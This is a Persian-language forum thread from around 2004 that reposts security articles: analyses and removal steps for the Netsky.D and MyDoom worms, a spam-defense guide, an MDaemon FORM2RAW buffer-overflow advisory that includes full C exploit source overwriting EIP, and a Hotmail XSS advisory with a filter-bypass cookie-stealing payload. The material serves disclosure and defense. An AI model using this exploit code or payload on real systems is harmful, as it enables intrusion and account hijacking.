آژانس هواپیمایی
pop up

>>>>>>>>>>مقالات به درد بخور<<<<<<<<<<

شروع موضوع توسط black_jack_of_black_city ‏25 آپریل 2004 در انجمن گفتگوی آزاد

  1. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    [email protected]

    [email protected]

    نام :[email protected]
    نام مستعار : W32/[email protected]
    نوع : Executable mass-mailer
    حجم : 17427
    تاریخ شناسایی : 01.03.2004
    سطح گسترش : بالا
    درصد آلودگی : بالا
    قدرت تخریب : کم

    طی چند روز اخیر دو کرم اینترنتی با نام های Netsky.D و Beagle.J در سطح شبکه پخش و بیشتر از هزاران کامپوتر متصل به اینترنت را از طریق E-mail آلوده کرده اند
    بطوری که شرکت های معتبر که در زمینه امنیت شبکه فعالیت میکنند
    این ویروس ها را از نظر آلودگی و سطح گسترش در سطح بالا و خطرناک درجه بندی کرده اند .
    تا به این زمان به علت بیشتر بودن آمار Infection ویروس Netsky.D نسبت به ویروس
    Beagle.J ما ابتدا به بررسی [email protected] میپردازیم.

    : symptoms(علائم)
    1.وجود فایل “Winlogon.exe” در دایرکتوری ویندوز . %Windir%
    2.وجود ورودی "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" و کلید
    "ICQ Net" = "winlogon.exe -stealth"
    .
    :Technical description
    [email protected] در مقایسه با گونه های مشابه(که از طریق E-mail و شبکه های p2p منتقل میشوند)،این ویروس فقط از طریق E-mail منتقل میشودو خود را به تمامی آدرس های موجود که از سیستم آلوده شده بدست می آورد ، میفرستد .
    گونه های ایمیل بصورت زیر ظاهر میشوند،بطوری که موضوع بصورت متغیر، از رشته های
    زیر انتخاب میشود :
    Re: Re: Document"
    "Re: Re: Thanks!"
    "Re: Thanks!"
    "Re: Your document"
    "Re: Here is the document"
    "Re: Your picture"
    "Re: Re: Message"
    "Re: Hi"
    "Re: Hello"
    "Re: Re: Re: Your document"
    "Re: Here"
    "Re: Your music"
    "Re: Your software"
    "Re: Approved"
    "Re: Details"
    "Re: Excel file"
    "Re: Word file"
    "Re: My details"
    "Re: Your details"
    "Re: Your bill"
    "Re: Your text"
    "Re: Your archive"
    "Re: Your letter"
    "Re: Your product"
    "Re: Your website"

    متن نامه بصورت متغیر از رشته های زیر انتخاب میشود :
    "Your document is attached."
    "Here is the file."
    "See the attached file for details."
    "Please have a look at the attached file."
    "Please read the attached file."
    "Your file is attached."

    همچنین فایل Attach شده با نام و پسوند های زیر بصورت متغیر انتخاب میشود :
    "your_document.pif"
    "your_document.pif"
    "document.pif"
    "message_part2.pif"
    "your_document.pif"
    "document_full.pif"
    "your_picture.pif"
    "message_details.pif"
    "your_file.pif"
    "your_picture.pif"
    "document_4351.pif"
    "yours.pif"
    "mp3music.pif"
    "application.pif"
    "all_document.pif"
    "my_details.pif"
    "document_excel.pif"
    "document_word.pif"
    "my_details.pif"
    "your_details.pif"
    "your_bill.pif"
    "your_text.pif"
    "your_archive.pif"
    "your_letter.pif"
    "your_product.pif"
    "your_website.pif"
    هنگامی که User روی Attachment دوبار کلیک کند worm عملیات زیر را انجام میدهد :
    - فایل "winlogon.exe"را در دایرکتوری (%WINDIR%) کپی میکند .
    - کلید "ICQ net" = "winlogon.exe -stealth", را در مسیر :
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" اضافه
    میکند تا با هر بار Boot شدن سیستم اجرا شود .

    - از کار انداختن تعدادی از نرم افزارهای Antivirus و همچنین از بین بردن فعالیت wormهایی نظیر : Mydoom نسخه A و B .
    سپس کامپیوتر آلوده شده را بدنبال آدرس های ایمیل با پسوندهای زیر search میکند:
    ".eml"
    ".txt"
    ".php"
    ".pl"
    ".htm"
    ".html"
    ".vbs"
    ".rtf"
    ".uin"
    ".asp"
    ".wab"
    ".doc"
    ".adb"
    ".tbb"
    ".dbx"
    ".sht"
    ".oft"
    ".msg"
    ".shtm"
    ".cgi"
    ".dhtm"
    بعد از پیدا کردن آدرس ایمیل ها اقدام به فرستادن ایمیل به هر یک از آنها می نماید .
    همچنین این ویروس در تاریخ 1 یا 2 ماه مارس بین ساعت های 6 الی 9 صبح اقدام به تولید صدا از طریق Speakerها بطور مداوم نمود .
    این ویروس از شیوه پیشرفته تری نسبت به گونه های قبلی برای ارسال ایمیل ، استفاده
    میکند بطوری که سرعت ارسال ایمیل تا چندین برابر افزایش یافته است .
    همچنین از فرستادن خود به آدرسهای ایمیلی که دارای رشته های زیر باشند
    خودداری میکند :
    "icrosoft"
    "antivi"
    "ymantec"
    "spam"
    "avp"
    "f-secur"
    "itdefender"
    "orman"
    "cafee"
    "aspersky"
    "f-pro"
    "orton"
    "fbi"
    "abuse"
    "messagelabs"
    "skynet"

    : removal instructions
    برای پاکسازی این ویروس به دو روش میتوان عمل کرد :
    1.پاکسازی با Removing tool
    2.پاکسازی Manual

    .1برای پاکسازی با استفاده از Removing tool میتوانید پس از دریافت Tool از آدرس زیر
    اقدام به پاکسازی آن نمایید :
    ftp://ftp.f-secure.com/anti-virus/tools/f-netsky.exe
    2.برای پاکسازی Manual ، عملیات زیر را انجام دهید :
    1.ابتدا System restore را غیر فعال کنید .
    2.نرم افزار ضدویروس خود را به روز کنید .
    3.کامپیوتر خود را Restart کنید و با Safe mode یا VGA mode سیستم را بوت کنید.
    4.پس از به روز رسانی نرم افزار ضد ویروس ، تمام سیستم را برای ویروس
    [email protected] Scan کنید و تمامی فایل هایی که با این نام Detect شده اند
    را Delete کنید .
    5.مقداری را که به رجیستری اضافه شده است را حذف کنید.

    نکته :
    برای حذف مقدار اضافه شده به Registry باید طبق آدرس زیر عمل کنید :
    پس از اجرای برنامه Regedit ، در آدرس :
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    مقدار :
    "ICQ NET" = "%Windir%\winlogon.exe -stealth" را Delete کنید .

    و در آخر از Regedit خارج شوید .

    نوشته شده توسط shervin_sohrab
     
  2. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    دنیای Spam


    Introduction:
    مقوله اسپم بطور کلی شامل مباحث گسترده ای میباشد بطوری که امروزه سازمانها و نهادهای مختلف سرمایه گذاری های وسیعی در زمینه مقابله و اطلاع رسانی این پدیده را بکار بسته اند .هدف از این مقاله بطور خلاصه آشنایی با مفاهیم و طرز مقابله کاربران با این پدیده میباشد.

    Description:
    امروزه در دنیای مجازی همیشه افرادی هستند که با تجاوز به حقوق دیگران اقدام به فرستادن ایمیل به یک آدرس یا یک سایت قربانی، اقدام به e-mail bombing آن میکنند.
    در بسیاری از مواقع کار این ایمیل ها که خالی از هرگونه محتوا و اغلب دارای حجم های زیاد میباشند ، از پادرآوردن یک Server یا Network resources میباشد.
    account های مختلفی از یک سایت میتواند هدف این بمباران قرار گیرد که در آخر
    منجر به از کار افتادن سرویس دهی آن سایت
    یا برخوردی از نوع Denial of service شود .

    اسپم نیز گونه دیگری از این Bombingها میباشد که اقدام به فرستادن ایمیل به صدها ویاهزاران کاربر اینترنت مینماید.
    در بیشتر مواقع چیزی ناگوارتر از این نیست که کاربر بعد از دریافت ایمیل اسپم به آن Reply کند و مستقیما آدرس خود را در یک mailing-list که متشکل از هزاران آدرس میباشد، قرار دهد .

    در بعضی از مواقع وقتی که Bombing ایمیل و اسپم ایمیل با نوع دیگری از شیوه های غلط انداز مانند e-mail Spoofing ترکیب شود(نمومه ای که اقدام به تغییر دادن آدرس فرستنده میکند .) ،که در آنصورت نتیجه آن سخت تر شدن تشخیص فرستنده ایمیل میباشد.

    Technical details:
    بطور کلی هیچ سرویس دهنده ایمیلی وجود ندارد که از حملات اسپم ها در امان باشد یعنی هر شخصی با یک آدرس ایمیل valid میتواند اقدام به فرستادن ایمیل های اسپم به هر آدرس ایمیل valid دیگری یا یک news Group یا یک منبع بیانیه های رسمی نماید. که این امر تقریبا جلوگیری از فرستادن اسپم را غیر ممکن میسازد .
    هنگامی که بار زیادی از ایمیل بطرف یک سایت فرستاده یا از آن بگذرد ممکن است
    سایت با مشکلاتی از قبیل : از سرویس خارج شدن سایت بدلیل از دست دادن ارتباط با شبکه ، یا crash کردن سیستم یا از دست دادن سرویسی بخاطر :
    .1 بار زیاد ارتباط شبکه.
    2.استفاده از تمامی منابع سیستمی.
    3.پر شدن دیسک بخاطر ارسال بسته های پست شده متعدد شود .
    راه حل :

    Detection (A
    اگر متوجه شدید که سیستم به یکباره کند شده است (فرستادن ایمیل کند و یا امکانپذیر نباشد) ممکن است که برنامه ایمیل شما مشغول پردازش بار زیادی از پیغام ها باشد .
    Reaction(B
    ابتدا سعی کنید source ، E-mail bombing/spam را trace کنید ، سپس برای جلوگیری
    از رسیدن packetها از آن آدرسrouter خود را configureکنید .
    یا از ISP خود درخواست کنید تا router خود را Configure کند

    - Header نامه را مورد بررسی قرار دهید تا بتوانید منشاء حقیقی آن را بیابید ، پس از بررسی و پیدا کردن آدرس سایتها با آنها تماس بگیرید و آنها را از فعالیتشان مطلع سازید
    نکته: بخاطر داشته باشید شخص فرستنده همیشه ممکن است که تلاش کند تا هویتش ناشناخته باقی بماند . از این رو آدرس سایتی که جستجو کرده اید الزاما آدرس
    فرستنده اسپم نمیباشد .

    Prevention (c
    متاسفانه تا این زمان راهی برای جلوگیری از E-mail bombing/spamming وجود ندارد (به جز Disconnect کردن از اینترنت) و در کل راهی برای جلوگیری از حملات بعدی وجود ندارد.
    همچنین دسترسی به Mailing-list های بزرگ برای spammer ها امری آسان میباشد ،
    از این رو :
    1.
    tools های لازم را برای شناسایی و monitor کردن فعالیت آنها بکار ببرید .
    Toolsها باید با احتساب کمترین زمان ممکن دارای قابلیت های زیر باشند :
    - قابلیت ثبت Log بمنظور شناسایی منشاء اسپم
    - monitoring دقیق (Incoming-outgoing) message ها و دادن Alert و گزارش در صورتی که Message بطور مجدد از همان شخص یا سایت فرستاده شده باشد .
    بعد از شناسایی منشاء میتوان توسط ابزار دیگر اقدام به پاکسازی و Block کردن آنها
    نمود .
    اگر سایت شما از تعداد محدودی از mail-server ها استفاده میکند ، شما باید طوری
    Firewall خود را تنظیم کنید که ارتباط SMTP (simple mail transfer protocol) خارج از
    Firewall شما فقط به هاب مرکزی ایمیل ها منتهی شود .
    با اینکه این روش بطور کامل نمیتواند جلوی یک حمله را بگیرد ولی تا حد زیادی از
    مورد حمله قرار گرفتن ماشینهای دیگر از طریق SMTP (چه حمله بصورت E-mail باشد و چه حمله ای برای نفوذ به یک host .) باشد را میگیرد.
    درصورتی که با تعداد محدودتری از سیستم ها کار می کنید (مانند یک هاب اصلی و یک هاب Backup که باید configure شوند) ،
    راه دیگر استفاده از packet filter ها میباشد . بعلت وجود Flaw در پروتکل ها و مشکلات
    مدیران شبکه ، فیلتر سرویس های زیر توصیه میشود :

    DNS zone transfers socket 53 TCP
    tftpd socket 69 UDP
    link socket 87 TCP
    Sun RPC & NFS socket 111 and 2049 UDP & TCP
    BSD UNIX "r" cmds sockets 512, 513, and 514 TCP
    lpd socket 515 TCP
    uucpd socket 540 TCP
    openwindows socket 2000 UDP&TCP
    X windows socket +6000 UDP &TCP

    توصیه میشود سایتها، socket 53(TCP) را فیلتر کنند تا از انتقال داده ها در منطقه DNS
    جلوگیری شود .) فقط برای DNS های شناخته شده access تعریف کنید. )
    این امر موجب جلوگیری از شناسایی سیستم متصل به شبکه محلی شما توسط
    شخص نفوذگر میشود .

    در برخی مواقع ممکن است سیستم از طریق TFTP مورد حمله قرار گیرد و سیستم های آلوده سعی در بوت کردن Device های دیگر از طریق TFTP Daemon نمایند.
    در اینگونه موارد فیلتر کردن Connection های TFTP میتواند از چنین حملاتی جلوگیری
    نماید .
    - همچنین X Windows Socket از Range 6000 تا 6000 + بالاترین شماره ترمینالهای X
    روی آن host .

    اگر سایت شما نیاز به دادن سرویس های دیگر به User های خارجی ندارد ، آن سرویسها را فیلتر کنید .
    بطور مثال وقتی تمامی کاربران در شرکت هستند سرویس Telnet را فیلتر کنید ، همچنین تمام Connection های FTP سیستمها را بجزء سرورهای اطلاعاتی Public
    را فیلتر کنید .

    در ادامه فیلترینگ، توصیه میشود فیلترینگ بصورت محدوده آدرس Packet هاانجام شود
    تا از IP Spoofing نیز جلوگیری شود . (که توضیح آن از محدوده این مقاله خارج میباشد.)
    در آخر برای جلوگیری از حمله های denial of service که بر پایه بمبهای ICMP طراحی
    میشوند ،packetهای دور از دسترس:
    ICMP Redirectو ICMP Destination را فیلتر کنید . و در آخر، سایت ها باید packet های
    Source routed را نیز فیلتر کنند .
    2.
    طوری نرم افزار دریافت ایمیل خود را تنظیم کنید تا ایمیل ها را به file systemهایی که
    بخش per user quotas را بطور فعال دارند ، منتقل سازند .
    انجام این کار تا حد زیادی از خسارت وارده جلوگیری میکند و آن را فقط به چند account
    مورد هدف و نه کل سیستم ، منتهی میکند .
    3. کاربران را از وجود بمباران ایمیل و اسپم مطلع سازید و و از آنان درخواست کنید در
    صورت مشاهده مراتب آن را به شما گزارش کنند .
    4. مشکلات را با reply کردن یا forward کردن ایمیل اسپم بزرگتر نکنید .


    پایان .

    نوشته شده توسط shervin_sohrab در ساعت 9:45 February 01, 2004
    شيوع سريع ويروس MyDoom

    شيوع ويروس خطرناک MYDoom.A و MyDoom.B


    شيوع ويروس MyDoom در اينترنت طي ديروز و امروز بسيار گسترده شده است. شرکت مايکروسافت براي دومين بار طي رويه اي جديد به جاي چاره انديشي اساسي در مورد مشکلات امنيتي محصولات خود , جايزه اي 250,000$ براي شناسايي تهيه کنندگان اين ويروس اعلام کرد.

    پيشبيني مي شود که شيوع اين ويروس اختلالاتي را در کارکرد سيستم هاي آلوده و ترافيک شبکه اي و اينترنت در روزهاي آتي براي کاربران ايراني ايجاد خواهد کرد. لذا گروه امنيتي Hat-Squad توضيحي اجمالي در مورد اين ويروس و نحوه پاکسازي آن ارائه مي کند:

    اين ويروس به فرمت يک فايل اجرايي Pack شده با اندازه 22.528 بايت توسط Email و سيستم اشتراک فايل Kazaa منتشر مي شود.

    انتشار از طريق email:

    ويروس به شکل Attachment با عنوان (Subject) و متن متغير ارسال مي شود. آدرس فرستنده نيز به صورت random و غير معتبر است.
    عناوين ممکن ترکيبهاي تصادفي از موارد زير مي باشد:

    Error
    hello
    HELLO
    hi
    Hi
    Mail Delivery System
    Mail Transaction Failed
    Server Report
    Status


    متن email نيز بصورت تصادفي توسط کد ويروس ايجاد مي شود و در اکثر موارد شبيه متن زير است:
    The message contains Unicode characters and has been sent as a binary attachment.

    The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.

    و يا :

    Mail transaction failed. Partial message is available.

    نام فايل attachment حاوي ويروس به صورت تصادفي از بين ليست زير انتخاب مي شوذ:
    Data
    Readme
    Message
    Body
    Text
    file
    doc
    document

    پسوند (Extension) اين قايل نيز باز بصورت تصادفي .bat, .cmd, .pif, .exe, and .scr يا zip مي تواند باشد.


    ويروس آدرسهاي ارسال را با جستجو در کامپيوتر آلوذه شده داخل فايلهايي با Extension هاي زير جستجو مي کند:
    adb
    asp
    dbx
    htm
    php
    sht
    tbb
    txt
    wab


    انتشار از طريق Kazaa

    ويروس با کپي کردن خود در Folder هاي Share شده اين نرم افزار با نامهاي زير منتشر مي شود:

    nuke2004
    office_crack
    rootkitXP
    strip-girl-2.0bdcom_patches
    activation_crack
    icq2004-final
    winamp5

    جزييات فعال و اجرا شدن ويروس:

    به محض اجرا شدن ويروس, کذ اصلي ويروس يک کپي از خود را در دايکرکتوري system با نام taskmon.exe ايجاد کرده و با اضافه کردن کليد زير به registry سيستم باعث اجرا شدن ويروس در هر بار راه اندازي سيستم مي شود:

    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TaskMon = %System%\taskmon.exe"


    %System% توسط کد ويروس تنظيم مي شود.

    ويروس با ايجاد فايلي با نام SHIMGAPI.DLL در دايرکتوري system و اضافه کردن کليد به registry ويندوز کد Dll خود را به داخل پروسس explorer.exe وارد مي کند.

    اين Dll يک Backdoor خاص است که روي پورت 3127 TCP منتظر دريافت اطلاعات binary يا payload مانده و بعد از ذخيره سازي آنها را اجرا مي کند.

    همچنين يک روتين DoS Attack با هدف حمله به سايت www.sco.com در نسخه ابتدايي ويروس قرار داده شده بود که در ساعات اخير با باز توليد گونه هاي جديد اين ويروس www.microsoft.com هم مورد حمله قرار خواهد گرفت.

    همچنين در گونه B از اين ويروس اسامي فايلها و کليدهاي رجيستري تغيير يافته اند
     
  3. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    ضعف امنيتي از نوع Buffer Overflow در MDaemon Mail Server v6.85

    ضعف امنيتي از نوع Buffer Overflow در MDaemon Mail Server v6.85

    تاريخ تماس با شرکت Alt-n و مطلع سازي: 9 دي ماه 1382(12/29/2003)

    تاريخ انتشار: 9 دي ماه 1382(12/29/2003)

    تحقيق و کشف: پژمان داورزني

    تهيه Exploit: بهرنگ فولادي

    انتشار Advisory در BugTraq و تاييد خبر و Exploit در سايت PacketStormSecurity

    موضوع:

    FORM2RAW.exe يک برنامه CGI است که به کلربران امکان ارسال Email را از طريق وب و سرويس دهنده MDaemon مي دهد. اين CGI فيلدهاي ارسال شده از فرم HTML را پردازش کرده و فايلي با فرمت RAW در Queue برنامه MDaemon ايجاد مي کند. اين فايل توسط Mail Server خوانده شده و ارسال مي شود.

    MDaemon ازنسخه 6.52 به بالا ايميل هايي را که آدرس فرستنده آنها روي خود MDaemon وجود نداشته باشد, ارسال نخواهد کرد. اين خصوصيت را مي توان با تنظيم FromCheck در FORM2RAW.INI غير فعال کرد.

    جزييات:

    در صورتي که طول رشته ورودي From (آدرس فرستنده) بيش از 153 بايت باشد, MDaemon در هنگام پردازش فايل RAW ايجاد شده, باعث سررسز بافر(Buffer Overflow) مي شود. با ارسال بيش از 249 بايت, رجيستر EIP نيز قابل تغيير است.

    FORM2RAW.exe از طريق وب سرور WorldClient که همراه MDaemon نصب مي شود و روي پورت 3000 سرويس دهي مي کند, قابل دسترسي است.

    کد Exploit:

    #include <windows.h>
    #include <stdio.h>
    #include <winsock.h>
    #pragma comment (lib,"ws2_32")
    #define PORT 3000
    void main(int argc, char **argv)
    {
    SOCKET s = 0;
    WSADATA wsaData;

    if(argc < 2)
    {
    fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
    "\nUsage: %s <target ip> \n", argv[0]);

    printf("%d",argc);
    exit(0);
    }

    WSAStartup(MAKEWORD(2,0), &wsaData);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if(INVALID_SOCKET != s)
    {
    SOCKADDR_IN anAddr;
    anAddr.sin_family = AF_INET;
    anAddr.sin_port = htons(PORT);
    anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

    if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
    {
    static char buffer[500];
    int i;
    memset(buffer,0,sizeof(buffer));
    strcpy(buffer,"get /form2raw.cgi?From=");
    for(i=0;i<244;i++) {

    strcat(buffer,"a");
    }

    strcat(buffer,"bbbb"); //Overwrites EIP
    strcat(buffer,"c"); //One byte left after ESP :-(
    strcat(buffer,"&[email protected]&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

    send(s, buffer, strlen(buffer), 0);
    printf("Exploit Sent.");

    }

    else printf("Error Connecting to The Target.\n");
    closesocket(s);
    }

    WSACleanup();
    }

    پاسخ شرکت Alt-n (توليد کننده نرم افزار MDaemon):

    آقاي Robin Edwards از شرکت Alt-n با تاييد موضوع, اعلام کرده که بزودي Patch براي برطرف کردن اين ضعف منتشر خواهد شد. تا زمان انتشارPatch روش زير را براي غير فعال کردن FORM2RAW.exe توصيه کرده است:

    Robin Edwards <support helpdesk altn com> Wrote:

    We have had a similar vulnerability report with Form2Raw and hope to release a patch
    soon. In the meantime it is easy to disable Form2Raw by following the instructions
    below:
    -----
    To disable FORM2RAW open the
    \MDaemon\WorldClient\WorldClient.ini file with Notepad and
    delete the following two lines:

    CgiBase2=/Form2Raw.cgi
    CgiFile2=C:\MDaemon\CGI\Form2Raw.exe

    Afterward, restart WorldClient to register the change.
    -----
     
  4. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    ضعف امنيتي XSS در سرويس Hotmail

    آقاي سلمان نيک صفت دانشجوي کامپيوتر
    دانشگاه پلي تکنيک تهران، موفق شدند ضعف امنيتي از نوع Cross Site Scripting
    در سرويس پست الکترونيک Hotmailکشف و اعلام نمايند


    متن email ارسالي ايشان به سايت

    Securiteam.comو hat-squad.com :




    New XSS vulnerability in Microsoft Hotmail allows access to mailboxes
    Summary:
    Hotmail is one of the world's largest providers of free, Web-based e-mail.
    Hotmail contains a XSS vulnerability which allows attackers to hijack
    another user session, and access to her/his mailbox and other MSN
    services. Unlike most XSS attacks, which require a user to click on a
    tainted link, exploitation in this case only requires a Hotmail user to
    view a malicious e-mail. Sending the e-mail from a forged e-mail address
    affords a greater chance for successful exploitation.
    Detail:
    By sending the following HTML email it's possible to bypass Hotmail
    securuity filters and run Javascript code on the client browser.
    <xmp><IMG src='test.gif&</xmp><IMG onerror=alert(document.cookie)
    src='><IMG src='><IMG src='test.gif&''''>




    Analysis:
    The idea behind the above HTML code is <XMP> and the single qoutes. Any
    html elements between <xmp> tags are just printed to screen and ignored by
    browser, so the first single qoute is ignored by the browser, but hotmail
    filter thinks it's a valid single qoute for some kind of value. so hotmail
    filter ignores the part of code between the first and second qoute, But
    the client browser acts diffrently and run the Jscript code.
    Running Jscript code gives the attacker the ability to steal the user
    cookie. Once a user's Hotmail cookie has been stolen, an attacker has the
    ability to gain full control over the user's account until the user logs
    out or the session times out. (Hotmail's default setting is to never
    timeout). During that time, an attacker could read, remove, and store all
    e-mails, as well as send e-mails from the compromised account.
    The ability to execute arbitrary Hotmail actions allows an attacker to set
    any option that the targeted user could normally set under the Options
    menu. This includes redirecting all e-mail to the deleted folder and
    modifying the user's name or e-mail signature.
    For further information on this class of attacks, refer to "The Evolution
    of Cross-Site Scripting Attacks," an iDEFENSE White Paper available at .




    Exploit:
    In the lab we've developed a working exploit which downloads the Hotmail
    INBOX of a user once he/she opens our email. A sample exploit is available
    online. It just runs a very simple code of jscript once u open the email.

    http://ce.aut.ac.ir/~niksefat/hotmail/hotmail-xss-test.php
    Advisory:
    The original text could be found here:

    http://ce.aut.ac.ir/~niksefat/hotmail/hotmail-xss-report.html
    Credits:
    This vulnerability has been discovered by Salman
    Niksefat([email protected]) BS student of computer engineering at the
    university of Amirkabir(www.aut.ac.ir).







    توضيح پيرامون تگ <XMP>

    http://www.scit.wlv.ac.uk/encyc/xmp.html


    کد Exploit براي نمايش ضعف

    http://ce.aut.ac.ir/~niksefat/hotmail/hotmail-xss-test.php
     
  5. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    در ويندوز xp منوي عكسها و يا ارسال فكس با image veiwer يا fax viewer به صورت استاندارد تعريف شده و گاهي اوقات براي كاربر مزاحمت هايي ايجاد مي كند كه باعث ناراحتي در استفاده از ويندوز xp مي شود. براي اين كه اين مشكل رفع شود، مي توانيد اين منو را از كار بيندازيد. براي اين كار بايد سراغ رجيستري رفته و ديتا value مورد نظر را پاك كنيد تا همه چيز حل شود. لطفا با تايپ Regedit در منوي RUN روي استارت كار را شروع كرده و با ورود به رجيستري سراغ كندوي بزرگ HKEY-CLASSES RROOT برويد آن را كليك كرده و بعد شاخه System FileAssociations را بيابيد. با پيداكردن آن لطفا زيرشاخه بعدي يعني image را يافته و با كليك روي آن زيرشاخه Shell EX را پيدا كنيد. سپس زيرشاخه بعدي Context Menu Handlers را پيدا كنيد و داخل آن نيز زيرشاخه مورد نظر يعني Shell Image Preview را خواهيد ديد. لطفا دست نگه داريد. به پوشه روبه روي اين زيرشاخه به نام Default كه به صورت String است و Value داخل آن بدين صورت نوشته شده ، دقت كنيد:cb260c236066} - b725-45f6 - 1d6a -{e84fda7c براي از كار انداختن Preview كافي است اين ديتا Value را پا كرده و Ok كنيد. به همين راحتي حالا ديگر خبري از باز شدن تصاوير با image Preview نخواهد بود.

    HKEY - CLASSES - ROOT \ System File Associations\ image \ ShellEX\ Context Menu Handlers\ Shell Image Preview
     
  6. Mashaheer

    Mashaheer مدیر بازنشسته کاربر فعال

    تاریخ عضویت:
    ‏5 می 2003
    نوشته ها:
    1,972
    تشکر شده:
    16
    محل سکونت:
    UAE
    دستت درد نكنه بلكي جان اطلاعات خوبي بودش
     
  7. boxilink
  8. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    قابل نداشت طاها جان حالا كه هستي يه نيگاهي بكن اينجا بببين چه ميرگشه اين http://weblog.netbaz.com
     
  9. fotocopy

    fotocopy مدیر بازنشسته

    تاریخ عضویت:
    ‏9 جولای 2003
    نوشته ها:
    2,850
    تشکر شده:
    35
    محل سکونت:
    جالب بود
     
  10. iranvig

    iranvig کاربر تازه وارد

    تاریخ عضویت:
    ‏22 می 2003
    نوشته ها:
    407
    تشکر شده:
    4
    بلاكي عجب توپ ميزني ، خوب بيا تو سايت منم بزن كه بيشتر معروف شي.
     
  11. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    شرمنده من اكانتك يادم رفته پسوورد ندارم

    اينو حلش كن ميام
     
  12. fotocopy

    fotocopy مدیر بازنشسته

    تاریخ عضویت:
    ‏9 جولای 2003
    نوشته ها:
    2,850
    تشکر شده:
    35
    محل سکونت:
    كجايي بلك كه يادت بخير
     
  13. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    اینجام عزیز
     
  14. avajang.com .leftavajang.com.right
  15. fotocopy

    fotocopy مدیر بازنشسته

    تاریخ عضویت:
    ‏9 جولای 2003
    نوشته ها:
    2,850
    تشکر شده:
    35
    محل سکونت:
    به به
    ديگه داشتم نا اميد ميشدم
     
  16. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    من فقط 20 مینیوت وقت دارم باید رفت
     
  17. fotocopy

    fotocopy مدیر بازنشسته

    تاریخ عضویت:
    ‏9 جولای 2003
    نوشته ها:
    2,850
    تشکر شده:
    35
    محل سکونت:
    کي مياي دوباره؟
     
  18. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    انشاالله 3 ماهه ديگه
     
  19. Sabzine

    Sabzine Registered User

    تاریخ عضویت:
    ‏11 نوامبر 2003
    نوشته ها:
    112
    تشکر شده:
    142
    محل سکونت:
    تهران
    بلك جان همه بايد بريم ( البته اكثرا نريم ! )
    حالا يكي زود يكي دير !
    دلشاد و موفق باشي ! ;)
    هر جا كه هستي ...
     
  20. black_jack_of_black_city

    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    مخلصم محسن جان برا 4 پن روز یه قرار بذار همو ببینیم
     
  21. Sabzine

    Sabzine Registered User

    تاریخ عضویت:
    ‏11 نوامبر 2003
    نوشته ها:
    112
    تشکر شده:
    142
    محل سکونت:
    تهران
    روح الله جان عزيز :)
    راستش بي رو در وايسي بگم :
    تو گلوم گير كرد !!! ( اين جمله هه ها , نه ..... ! )
    از شما چه پنهون سرم به شدت شلوغ پلوغ شده ( موهام هم براي همين داره ميريزه :( كه سرم زياد شلوغ نمونه ! :( )
    ولي حالا شما آيديت كه معلومه ؟ و ايميلت ؟
    اگه توفيق بود خيلي خوشحال ميشم در خدمت دوستان عزيزي مثل شما باشم
    ( هر چند كه قيافه نور بالا ميزنه و خيلي خفنه و .... خلاصه دل شير ميخواد قرار گذاشتن با شما )
    به هر حال خيلي دوست دارم قراري باشه و بيام اگه فرصت باشه ( اومدني بودم خبرت ميكنم )
    البته به نظرم بعيده !( دست خودم نيس !) اميدوارم زياد شرمنده نشم !
    به هر حال اگه خبري نشد كه يعني هيچي ديگه ...
    ( چون از وعده سر خرمن دادن دل خوشي ندارم )
    موفق باشي ;)
     
  22. black_jack_of_black_city

